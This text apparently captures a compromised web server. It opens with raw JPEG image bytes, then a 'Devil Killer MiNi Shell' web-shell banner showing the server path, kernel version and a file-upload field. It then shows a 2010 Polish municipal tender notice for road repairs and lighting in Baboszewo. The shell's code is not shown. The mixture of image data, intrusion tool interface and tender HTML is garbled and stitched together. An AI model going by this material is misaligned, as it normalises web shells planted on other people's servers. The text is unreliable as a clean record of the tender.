JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100215/42700-N-2010.html

<p class="kh_header"><b>Baboszewo: 1. Remont dróg gminnych (Gmina Baboszewo, pow. płoński, woj. mazowieckie)  
2.  Uruchomienie oświetlenie w ciągach remontowanych dróg i drogach 
   łączących.</b><br>
<b>Numer ogłoszenia: 42700 - 2010; data zamieszczenia: 15.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baboszewo , ul. Warszawska 9A, 09-130 Baboszewo, woj. mazowieckie, tel. 023 6611091 w. 34, faks 023 6611071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugbaboszewo.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Remont dróg gminnych (Gmina Baboszewo, pow. płoński, woj. mazowieckie)  
2.  Uruchomienie oświetlenie w ciągach remontowanych dróg i drogach 
   łączących..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Remont dróg gminnych:
Zadanie 1
Remont drogi gminnej Nr 300172W Pawłowo-Dziektarzewo o długości  1 981,40 mb
        N a w i e r z c h n i a
.	Skropienie międzywarstwowe nawierzchni bitumicznej emulsją asfaltową (szybkorozpadową K-65)  w ilości 0,3 kg/m2 -   
        8 966,00 m2
.	Wykonanie warstwy  ścieralnej   gr. 4 cm z mieszanki mineralno - asfaltowej grysowej wg normy PN-S-96025 
        i uziarnieniu 0/12,8 mm -   8 966,00 m2
       P o b o c z a
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 2 972,1 m2
O z n a k o w a n i e
.	Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
Tarcze znaków foliowane   - 20 szt
.	Dostawa i ustawienie słupków prowadzących wzdłuż rowu melioracyjnego - 20 szt.
U r u c h o m i e n i e  o ś w i e t l e n i a
.	Włączenie 9 punktów świetlnych

Zadanie 2
 Remont drogi gminnej Nr 300157W Pawłowo -Galomin  od km 0+000 do km 2+150  o długości 2 150 mb
       P o b o c z a
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 3 225,0 m2
O z n a k o w a n i e
.	 Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
         Tarcze znaków foliowane   - 7  szt
.	Dostawa i montaż barier mostowych  (poręcze skrajne)   na moście w Galominie  o wys. 110 cm   -  64 mb

Zadanie 3 
        Remont drogi gminnej Nr 300141W Lachówiec - Kiełki od km 0+000 do km 2+027  o długości 2 027 mb
.	Skropienie międzywarstwowe nawierzchni  bitumicznej emulsją asfaltową (szybkorozpadową K-65)  w ilości 0,3 kg/m2 -    9 133,00 m2
.	Wykonanie warstwy  ścieralnej   gr. 4 cm z mieszanki mineralno - asfaltowej grysowej wg normy PN-S-96025 
        i uziarnieniu 0/12,8 mm -   9 133,00 m2

       P o b o c z a
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 3 040,50 m2
O z n a k o w a n i e
.	Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
       Tarcze znaków foliowane   -  15 szt.

U r u c h o m i e n i e  o ś w i e t l e n i a
.	Włączenie 22 punktów świetlnych


Zadanie 4
Remont drogi gminnej  Nr 300148W  Cieszkowo Nowe-CieszkowoStare - Krościn  od km 0+000 do km 4+172o długości   4 172,00 mb       
        N a w i e r z c h n i a
.	Skropienie międzywarstwowe nawierzchni bitumicznej emulsją asfaltową (szybkorozpadową K-65)  w ilości 0,3 kg/m2 -    18 822,00 m2
.	Wykonanie warstwy  ścieralnej   gr. 4 cm z mieszanki mineralno - asfaltowej grysowej wg normy PN-S-96025 
        i uziarnieniu 0/12,8 mm -   18 822,00 m2
       P o b o c z a
.	Wykonanie koryta gł. 24 cm szer. 40 cm  z odwiezieniem gruntu na odl. 2 km  - 3 337,6 m2
.	Wzmocnienie poboczy kruszywem łamanym o uziarnieniu 0/063 mm, grubość warstwy 12 cm + 12 cm.  - 3 337,6 m2
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 6 258,0 m2
O z n a k o w a n i e
.	Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
       Tarcze znaków foliowane   -  4 szt.
U r u c h o m i e n i e  o ś w i e t l e n i a
.	Włączenie 32 punktów świetlnych

Zadanie 5
Remont drogi gminnej Nt 300150W Krościn - Sokolniki  Stare od kma 0+000 do km 1+252  o długości 1 252 mb 
        N a w i e r z c h n i a
.	Skropienie międzywarstwowe nawierzchni bitumicznej emulsją asfaltową (szybkorozpadową K-65)  w ilości 
        0,3 kg/m2 -  5 646 ,00 m2
.	Wykonanie warstwy  ścieralnej   gr. 4 cm z mieszanki mineralno - asfaltowej grysowej wg normy PN-S-96025 
       i uziarnieniu 0/12,8 mm -   5 646,00 m2
     P o b o c z a
.	Wykonanie koryta gł. 24 cm szer. 40 cm  z odwiezieniem gruntu na odl. 2 km  - 1001,6 m2
.	Wzmocnienie poboczy kruszywem łamanym o uziarnieniu 0/063 mm, grubość warstwy 12 cm + 12 cm.  - 1 001,6 m2
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 1 878 m2
   O z n a k o w a n i e
.	Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
       Tarcze znaków foliowane   -  4szt.
U r u c h o m i e n i e  o ś w i e t l e n i a
.	Włączenie 13 punktów świetlnych

Zadanie 6 
Remont drogi gminnej Nr  300151W   Sokolniki Stare - Baboszewo  od km 0+000 do kim 1+262   o dł.  1 262,00  mb
        N a w i e r z c h n i a
.	Skropienie międzywarstwowe nawierzchni bitumicznej  emulsją asfaltową (szybkorozpadową K-65)  w ilości
         0,3 kg/m2 -   5 703 ,00 m2
.	Wykonanie warstwy  ścieralnej   gr. 4 cm z mieszanki mineralno - asfaltowej grysowej wg normy PN-S-96025 
       i uziarnieniu 0/12,8 mm -   5 703,00 m2
      P o b o c z a
.	Wykonanie koryta gł. 24 cm szer. 40 cm  z odwiezieniem gruntu na odl. 2 km  - 1009,6 m2
.	Wzmocnienie poboczy kruszywem łamanym o uziarnieniu 0/063 mm, grubość warstwy 12 cm + 12 cm.  - 1 009,6 m2
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 1 893 m2
   O z n a k o w a n i e
.	Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
       Tarcze znaków foliowane   -  4szt.
.	Malowanie przejść dla pieszych - 18 m2
    U r u c h o m i e n i e  o ś w i e t l e n i a
.	Włączenie 9 punktów świetlnych

Zadanie 7 
Remont drogi gminnej Nr  300118W   Sokolniki Nowe - Korzybie - Zbyszyno od km 1+579,50 do km 4+796,30 
  o dł.  3 216,80   mb
        N a w i e r z c h n i a
.	Skropienie międzywarstwowe nawierzchni  bitumicznej  emulsją asfaltową (szybkorozpadową K-65  w ilości 0,3 kg/m2 -    14 575,00 m2
.	Wykonanie warstwy  ścieralnej   gr. 4 cm z mieszanki mineralno - asfaltowej grysowej wg normy PN-S-96025 
       i uziarnieniu 0/12,8 mm -   14 575,00 m2
      P o b o c z a
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 4 825,2 m2
   O z n a k o w a n i e
.	Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
       Tarcze znaków foliowane   -  23 szt.
.	Ustawienie barier ochronnych SP-09 4790-4802 o długości 24 m 

Zadanie 8 
Remont drogi gminnej Nr  300120W  w miejscowości Korzybie od km 0+530 do km 2+060  o dł.  1 262,00  mb
        N a w i e r z c h n i a
.	Skropienie międzywarstwowe nawierzchni bitumicznej  emulsją asfaltową (szybkorozpadową K-65)  w ilości 0,3 kg/m2 -  6 909,00 ,00 m2
.	Wykonanie warstwy  ścieralnej   gr. 4 cm z mieszanki mineralno - asfaltowej grysowej wg normy PN-S-96025 
       i uziarnieniu 0/12,8 mm -   6 909,00 m2
      P o b o c z a
.	Warstwa żwiru, kruszywo rozścielane mechanicznie, grubość warstwy po zagęszczeniu  5 cm  - 2 295 m2
   O z n a k o w a n i e
.	Dostawa i ustawienie znaków drogowych pionowych na słupkach z rur stalowych o dł. 330 cm i średnicy 70 mm.
       Tarcze znaków foliowane   -  7 szt.
  
2.  Uruchomienie oświetlenia w ciągach dróg łączących się z ww drogami.
     Włączenie 115 punktów świetlnych. 
       

Lachówiec	4;
Rzewin	10;
Rzewin (w kierunku Galominka Nowego)	8;
	Rzewin (w kierunku szkoły)	4;
Cieszkowo Kolonia	16;
Cieszkowo Nowe	14;
Krościn (droga powiatowa)	5;
Krościn (droga gminna)	6;
Sokolniki Stare	5;
Mystkowo	43;
                                                                                   

W  pasie drogowym części remontowanych odcinków oraz przy drogach  bezpośrednio przyległych znajdują się 
instalacje oświetlenie, które nie były eksploatowane od kilkunastu lat.
Instalacje  zamontowane są na słupach energetycznych i stanowią własność Zakładu Energetycznego Płock - Dystrybucja Wschód Sp. z o.o. 
W celu uruchomienia oświetlenia należy dokonać kompleksowego remontu instalacji polegającego na wymianie opraw (montaż energooszczędnych opraw sodowych 70 W) uzupełnienie skorodowanych lub brakujących elementów instalacji oświetleniowej oraz zamontowanie nowych urządzeń sterowniczych (zegary astronomiczne).    
Realizację tego zadania Wykonawca może zlecić  ZE Płock lub wykonać samodzielnie ale po wcześniejszym uzgodnieniu warunków technicznych z właścicielem instalacji.  Adres: ZE Płock, Dystrybucja Wschód Sp. z o.o.  06-400 Ciechanów, ul. Mławska 3 ;  tel. Kontaktowy  023 683 83 35


3.   Wykonanie czynności towarzyszących tj. zapewnienie i pokrycie kosztów      
 fachowego nadzoru   geodezyjnego   w trakcie   budowy, a po jej zakończeniu     przedłożenie protokołu  inwentaryzacji  powykonawczej

4.   Szczegółowy zakres przedmiotu zamówienia zawarty jest w:
       
   -      OPISIE TECHNICZNYM  opracowanym zgodnie z przepisami Prawa budowlanego i spełniających   
          wymagania rozporządzenia Ministra Infrastruktury z dnia 03 lipca 2003 r. w sprawie szczegółowego 
          zakresu i formy projektu budowlanego (Dz.U. Nr 120, poz. 1133)
-	KOSZTORYSIE OFERTOWYM  zawierającym zestawienie przewidywanych do wykonania robót w 
        kolejności  z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz 
            wskazaniem podstaw do ustalania cen jednostkowych robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.20-7, 45.23.32.80-5, 45.23.32.90-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.      WADIUM  -   15.000 zł  (słownie:  - piętnaście  tysięcy złotych- ) 
         Wadium należy wnieść zgodnie z art. 45 ust. 6 ustawy - Prawo zamówień publicznych, w jednej lub kilku 
         następujących formach:
         - pieniądzu,
-	poręczeniach bankowych lub poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo-
      kredytowej.,
         - gwarancjach bankowych,
         - gwarancjach ubezpieczeniowych. 
         - poręczeniach udzielonych przez podmiot, o których mowa w art.6 ust.3 pkt.4 lit.b ustawy z dnia 9 
           listopada      2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz.U. z 2007 r. Nr 42 
            poz.275) 
          W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego 
          wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego
          w kasie Urzędu Gminy Baboszewo lub dołączyć do oferty.

     2.  Wadium wnoszone w pieniądzu  wpłaca się  na rachunek bankowy Zamawiającego:   
   Bank Spółdzielczy w Płońsku Oddział w Płońsku  Nr 73 8230 0007 0005 6300 2000 0004
    W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin 
    uznania kwoty na rachunku Zamawiającego.

3.	Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy wspólnie wnoszą jedno wadium  15.000 zł.
4.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży kserokopie uprawnień do kierowania robotami budowlanymi w 
      specjalności   w zakresie drogownictwa  + zaświadczenie z właściwej izby samorządu zawodowego, 
      potwierdzających  przynależność do izby na dzień składania ofert.
Obowiązek załączenia do oferty uprawnień dotyczy tylko kierownika robót.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie, że w okresie ostatnich pięciu lat Wykonawca   zrealizował  (był głównym 
             wykonawcą)   co najmniej  dwie   roboty  o podobnym charakterze i złożoności co 
             przedmiot zamówienia tzn. roboty  modernizacyjne  dróg (wykonanie nawierzchni z mieszanki 
       mineralno asfaltowej grysowej) o  łącznej wartości każdej z nich (bez robót dodatkowych) nie 
        mniejszej jak w ofercie.
Co najmniej dwa dokumenty  potwierdzające , że roboty zostały   wykonane  zgodnie z zasadami sztuki 
      budowlanej i prawidłowo ukończone (referencje lub:  rekomendacje, listy polecające podpisane 
       protokoły odbioru, inne  dokumenty, z których treści wynika, że  roboty budowlane zostały wykonane 
       terminowo i zgodnie z zasadami sztuki budowlanej).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi dysponować następującym  wyposażeniem technicznym.
.	Samochód ciężarowy samowyładowczy o ład. min. 7,5 ton -  2 szt. 
.	Koparko-ładowarka -  - 1 
.	Spycharka - 1 
.	Walec stalowy gładki (8-10 ton)   - 1
.	Układarka mas bitumicznych -  1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kierownik budowy musi posiadać uprawnienia do kierowania robotami branży budowlanej   
         o specjalności z zakresu drogownictwa  i  dysponować co najmniej 2 letnim doświadczeniem 
         w  zakresie  robót o równoważnym charakterze i wielkości.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi dysponować kapitałem obrotowym i kredytami ( po odjęciu zobowiązań)
        w wysokości nie mniejszej niż  20%  wartości robót określonych w Ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

